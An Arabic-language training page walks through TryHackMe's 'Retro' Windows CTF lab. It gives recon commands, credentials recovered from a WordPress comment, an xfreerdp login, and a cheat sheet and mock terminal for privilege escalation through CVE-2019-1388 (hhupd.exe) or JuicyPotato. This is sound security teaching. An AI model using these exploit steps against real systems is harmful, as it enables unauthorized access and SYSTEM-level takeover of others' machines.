Lab: Retro | STY IT Labs
STY IT Labs · TryHackMe · Hard CTF

Lab: Retro
Windows Hard CTF

ادخل موقع WordPress قديم، اكتشف credentials مخبية في التعليقات، اخترق بـ RDP — ثم استخدم CVE-2019-1388 أو JuicyPotato للوصول لـ SYSTEM.

Hard Difficulty Windows Server 2016 WordPress 2 Attack Paths RDP Exploitation PrivEsc CVE
ابدأ اللاب المهام
SCORE: 9999 parzival WordPress /retro/ RETRO
Hard
2 – 4 ساعات
3 مهام
2 Paths
TryHackMe
Windows Server 2016

عن اللاب

Retro هو لاب Hard CTF مبني على قصة Ready Player One — Windows Server 2016 بيشتغل عليه WordPress blog على /retro/. المستخدم Wade نسي كلمة المرور في تعليق داخل موقعه الخاص!

اللاب عنده مسارين مختلفين تماماً للوصول الأولي: إما عبر WordPress Admin Panel + Reverse Shell، أو مباشرة بـ RDP بعد ما تلاقي الـ credentials. الـ PrivEsc كمان فيه خيارين: CVE-2019-1388 (hhupd.exe) أو JuicyPotato.

الجهاز لا يستجيب لـ ICMP — استخدم nmap -Pn دايماً في هذا اللاب.

Retro Badge

أكمل اللاب واحصل على الـ Badge — أضفه لملفك على LinkedIn وأثبت إنك اخترقت Hard room

مساران مختلفان للاختراق

Path A WordPress Shell

تسجيل دخول لـ WordPress Admin → تعديل theme PHP → رفع Reverse Shell → Meterpreter. يعطيك account بـ SeImpersonatePrivilege → JuicyPotato SYSTEM

Path B RDP Direct

استخدام credentials مباشرة في RDP → تسجيل دخول كـ Wade → hhupd.exe في Recycle Bin → CVE-2019-1388 → SYSTEM عبر Internet Explorer trick

مسار الهجوم — Path B (RDP)

1

Recon — Nmap بـ -Pn

فحص الـ ports مع تعطيل الـ ping discovery — هتلاقي port 80 (IIS) وport 3389 (RDP)

nmap -Pn -p- -T480 + 3389
2

Web Enum — Gobuster على /retro/

فحص IIS → صفحة افتراضية → Gobuster يكشف /retro/ → WordPress Blog بمنشورات Wade

/retro/WordPress
3

Find Credentials في التعليقات

Wade علّق على منشور "Ready Player One" بكلمة مرور: تبدو كـ reminder لنفسه! → Wade:parzival

Wade : parzival
4

RDP Login — xfreerdp

تسجيل دخول بالـ credentials على RDP → Desktop كـ Wade → ابحث في Recycle Bin

xfreerdp /u:wade /p:parzival
5

PrivEsc — CVE-2019-1388 (hhupd.exe)

في Recycle Bin → hhupd.exe → Run as Admin → Show certificate → VeriSign link → يفتح IE → CTRL+S → cmd.exe → SYSTEM!

CVE-2019-1388hhupd.exe
6

Capture Flags

user.txt في Desktop واد → root.txt في C:\Users\Administrator\Desktop

2 Flags 🏆

مراحل اللاب

Nmap -Pn
Gobuster /retro/
Find Credentials
RDP Access
PrivEsc CVE
SYSTEM 🏆

Commands Cheat Sheet

الأمرالوصفالمرحلة
nmap -p- -Pn -T4 <IP>فحص كل الـ ports بدون pingRecon
gobuster dir -u http://<IP> -w <wl>اكتشاف /retro/ directoryEnum
http://<IP>/retro/index.php/2019/12/09/ready-player-one/#comment-2رابط التعليق الذي يحتوي الـ passwordCreds
xfreerdp /u:wade /p:parzival /cert:ignore /v:<IP>اتصال RDP كـ WadeRDP
hhupd.exe → Run as Admin → Certificate linkCVE-2019-1388 — IE SYSTEM trickPrivEsc
CTRL+S في IE → cmd.exe → ENTERالخطوة الأخيرة لفتح SYSTEM cmdPrivEsc
JuicyPotato.exe -l 7777 -p cmd.exe -t * -c <CLSID>PrivEsc بديل (Path A)Alt
type C:\Users\Administrator\Desktop\root.txtقراءة الـ root flagFlag

المهام والأسئلة

Task 1 — Deploy the Machine

Deploy VM · Note: no ICMP · Add retroweb to /etc/hosts

+10 XP
02

Task 2 — Hack the Machine (Initial Access)

Find /retro/ · Wade's credentials in comment · RDP or WP Shell

+120 XP
03

Task 3 — Privilege Escalation to SYSTEM

hhupd.exe CVE-2019-1388 or JuicyPotato · user.txt + root.txt

+120 XP
▶ أدخل الـ Flag الخاص بمهمتك الحالية

Terminal — Retro Attack Path B

root@kali — Retro CTF
# ── Recon (no ICMP!) ─────────────────────────
└─# nmap -p 80,3389 -Pn -sV 10.10.X.X
80/tcp open http Microsoft IIS 10.0
3389/tcp open rdp Microsoft Terminal Services

# ── Gobuster → /retro/ ───────────────────────
└─# gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/retro (Status: 301)

# ── Found creds in comment ───────────────────
Wade: "parzival" (left in comment as reminder!)

# ── RDP Login ────────────────────────────────
└─# xfreerdp /u:wade /p:parzival /cert:ignore /v:10.10.X.X
[INFO] Connected · Welcome Wade! Check Recycle Bin

# ── CVE-2019-1388 ────────────────────────────
1. hhupd.exe → Run as Administrator
2. "Show more details" → "VeriSign Commercial..." link
3. IE opens as SYSTEM → CTRL+S → type cmd.exe → ENTER
C:\Windows\system32> whoami
nt authority\system

└─#

المهارات المكتسبة

Windows Enumeration
WordPress Exploitation
OSINT (Comments)
RDP Exploitation
CVE-2019-1388
JuicyPotato PrivEsc
SeImpersonatePrivilege
Multi-Path Thinking

الأدوات المستخدمة

nmap -Pnفحص الـ ports بدون ICMP
gobusterاكتشاف /retro/ directory
xfreerdp / rdesktopاتصال Remote Desktop
hhupd.exeCVE-2019-1388 PrivEsc exploit
JuicyPotato.exePrivEsc بديل بـ SeImpersonatePrivilege
دايماً ابدأ بـ Gobuster على الـ IIS root — الـ default page مش معناها مفيش حاجة!

تقدمك في اللاب

33%PROGRESS

1 / 3 مهام مكتملة

ابدأ اللاب على TryHackMe شوف الـ Writeup تحميل Cheat Sheet

Hard Room · Windows · بدون ICMP

Hints

Hint 1 — أين الـ Password؟−10 XP
Hint 2 — CVE-2019-1388−20 XP
Hint 3 — WordPress Shell−20 XP

Labs مشابهة

🧊

ICE

Easy/Med · Windows · TryHackMe
💥

Blaster

Easy · Windows · TryHackMe

RootMe

Easy · Linux · TryHackMe